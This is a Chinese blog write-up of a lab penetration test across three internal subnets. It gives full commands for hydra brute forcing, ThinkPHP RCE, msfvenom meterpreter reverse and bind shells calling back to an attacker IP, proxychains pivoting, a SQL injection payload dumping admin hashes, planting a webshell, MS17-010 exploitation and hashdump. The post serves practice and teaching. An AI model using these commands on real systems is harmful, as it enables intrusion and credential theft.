首页 > 其他分享 >三层靶机内网渗透测试

三层靶机内网渗透测试

时间:2023-06-24 12:55:21浏览次数:35  
标签:proxychains set 渗透 端口 192.168 exploit 靶机 三层 meterpreter

三层靶机内网渗透测试

信息收集

目标ip:192.168.31.145

端口信息收集:nmap -A -T4 -p- 192.168.31.145

开放端口:21/22/80/111/888/3306/8888      操作系统:Liunx

分析利用

21/22端口--弱口令爆破

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.31.145 ftp

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.31.145 ssh

 

3306端口--Mysql远程连接

不允许远程IP连接

80端口--web服务

Thinkphp v5.0 存在远程命令执行漏洞,直接上工具

然后使用蚁剑连接

主机信息收集

ifconfig发现存在192.168.22.0/24的内网网段。

探测此网段存活主机

Ladon

fscan

反弹Shell

# 生成Linux系统elf可执行文件(PHP也可以)

msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.31.57 lport=6666 -f elf > howie.elf

#msf监听

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.57
msf6 exploit(multi/handler) > set lport 6666
msf6 exploit(multi/handler) > run

上传文件,添加权限,目标执行./howie.elf 得到Shell

建立Socks代理

添加到 192.168.22.0/24 网段的路由:

run autoroute -s 192.168.22.0/24    run autoroute -p

 

使用 MSF 的 socks5 模块启动 socks 代理服务

msf6 > use auxiliary/server/socks_proxy

配置proxychains.conf      socks5 127.0.0.1 1080    验证代理是否成功 proxychains curl http://192.168.22.129

 

信息收集

proxychains nmap -sT -Pn -p- -n -T4 192.168.22.129

开放端口:21/22/80/888/3306/8888

  • 21 / 22 / 3306端口

弱口令爆破失败

  • 8888端口

宝塔页面,无法利用

  • 80端口

bageCMS,经测试存在sql注入,使用sqlmap跑一下,proxychains sqlmap -u 'http://192.168.22.129/index.php?r=vul&keyword=1' -p keyword 

proxychains代理后的sqlmap不稳定,有时候行,有时候不行,这次就失败了,所以转为手工注入

http://192.168.22.129/index.php/r=vul&keyword=1'unionselectgroup_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin--+

用户名:admin     密码hash解密后:123qwe

登录到网站后台管理http://192.168.22.129/index.php?r=admini/public/login

修改site/index.php加入一句话木马

蚁剑挂上代理连接成功

主机信息收集

发现存在192.168.33.0/24的内网网段。

fscan扫描

发现存活主机192.168.33.33,win7,可能存在ms17-010

反弹Shell

  • msfvenom 生成 linux 木马 payload

msfvenom -p linux/x64/meterpreter/bind_tcp lport=5555 -f elf -o 5555.elf

  • 上传到 Target2 的 /tmp 目录并赋权执行
  • 创建正向监听器,建立正向连接

#msf监听

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.22
set lport 5555

添加路由

run autoroute -s 192.168.33.0/24

信息收集

proxychains nmap -sT -Pn -p- -n -T4 192.168.33.33

开放端口:135/139/445/3389

 

分析利用

  • 445端口

检测利用ms17-010漏洞

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 192.168.33.33

set payload windows/x64/meterpreter/bind_tcp

失败,试一下另一个payload

use exploit/windows/smb/ms17_010_psexec

set RHOSTS 192.168.33.33

set payload windows/x64/meterpreter/bind_tcp

set LPORT 4445

成功

  • 3389端口

远程桌面连接

# 获取管理员用户密码

meterpreter:run post/windows/gather/hashdump 

Administrator/teamssix.com

配置proxifier

使用远程桌面连接

到此,三层内网靶机的渗透测试到此结束

此次测试主要练习的是对不同网段,以及不出网主机的渗透方法,以及如何使用proxychains去做内网穿透


 

标签:proxychains,set,渗透,端口,192.168,exploit,靶机,三层,meterpreter
From: https://www.cnblogs.com/WhatHowie/p/17500240.html

相关文章

  • WEB安全-渗透测试-waf绕过信息收集
    waf绕过WAF拦截会出现在安全测试的各个层面,掌握各个层面的分析和绕过技术最为关键本文主要讲述以下四种环境下的waf绕过Safedog-默认拦截机制分析绕过-未开CCSafedog-默认拦截机制分析绕过-开启CCAliyun_os-默认拦截机制分析绕过-简要界面BT(防火墙插件)-默认拦截机制分......
  • Vulnhub: Corrosion:2靶机
    kali:192.168.111.111靶机:192.168.111.131信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.131通过nmap脚本枚举出8080端口存在backup.zip文件,下载后解压发现需要密码,利用john爆破压缩包密码得到密码:@administrator_hi5zip2johnbackup.zip......
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
    Cengbox2识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Cengbox2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Vulnhub: Corrosion靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130目录爆破blog-post目录下存在两个目录对archives目录中的randylogs.php进行测试发现存在文件包含wfuzz-c-w/opt/zidian/SecLists-2022.2/Di......
  • 渗透笔记:vulnhub靶机drippingblues--第一篇测试记录
    在不知道靶场的ip情况下进行扫描 出现有几个ip,但是不知道哪个是的,所以就一个个试一试namp-T4-sV-A-O-p- 192.168.13.143-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(所有端口)扫了好几个,只有一个是的,所以不是的就没有发出来了 ftp一下ip,发现有一......
  • Springboot web,三层架构, IOC&DI 使用总结2023
    Springbootweb,三层架构,IOC&DI使用总结2023一.spring.io全家桶springbootspringframework基础框架,配置繁琐,入门难度大--》springbootspringcloudspringsecurityspringdataspring发展到今天是一个生态圈,提供了若干个子项目,每个子项目用于完成特定的功能。二.sp......
  • 渗透基础
     WEB的组成架构模型网站源码:分脚本类型、分应用方向操作系统:Windows、Linux中间件(搭建平台):ApacheIISTomcatNginx等数据库:accessmysqlmssqloraclesybasedb2postsql等 WEB相关安全漏洞WEB源码类对应漏洞SQL注入,上传,xss,代码执行,变量覆盖,逻辑漏洞,反序列化......
  • 硬件&芯片安全渗透利器--BTS1002多接口精密触发故障注入仪
    注1:该软硬件产品均为湖南底网安全信息技术有限公司自主研发,已申请1个发明专利,2个实用新型专利,1个软著,转载请注明出处注2:详细内容详见产品技术手册、用户手册,官网下载地址:www.bttmsec.com/h-col-152.html注3:诚招区域独家代理合作伙伴,欢迎洽谈合作,湖南底网安全竭诚为您服务作者:bi......
  • 汉源高科4万兆光6个万兆光口+24个千兆光口+24千兆电口万兆三层网管型工业以太网交换机
     HY5700-856XG24GX24GT三层管理型工业以太网交换机,提供6个万兆光口+24个千兆光口+24个千兆电口。可帮助用户实现以太网数据的交换、汇聚以及远距离光传输功能。产品设计符合以太网标准,添加防雷、防静电保护措施,-40℃~+85℃的宽范围工作温度,性能稳定可靠。该设备可广泛应用于智能交......
  • Vulnhub: ICA:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标80,发现目标CMS为qdPM9.2搜索对应漏洞发现存在信息泄露searchsploitqdpm访问192.168.111.130/core/config/databases.yml得到目标......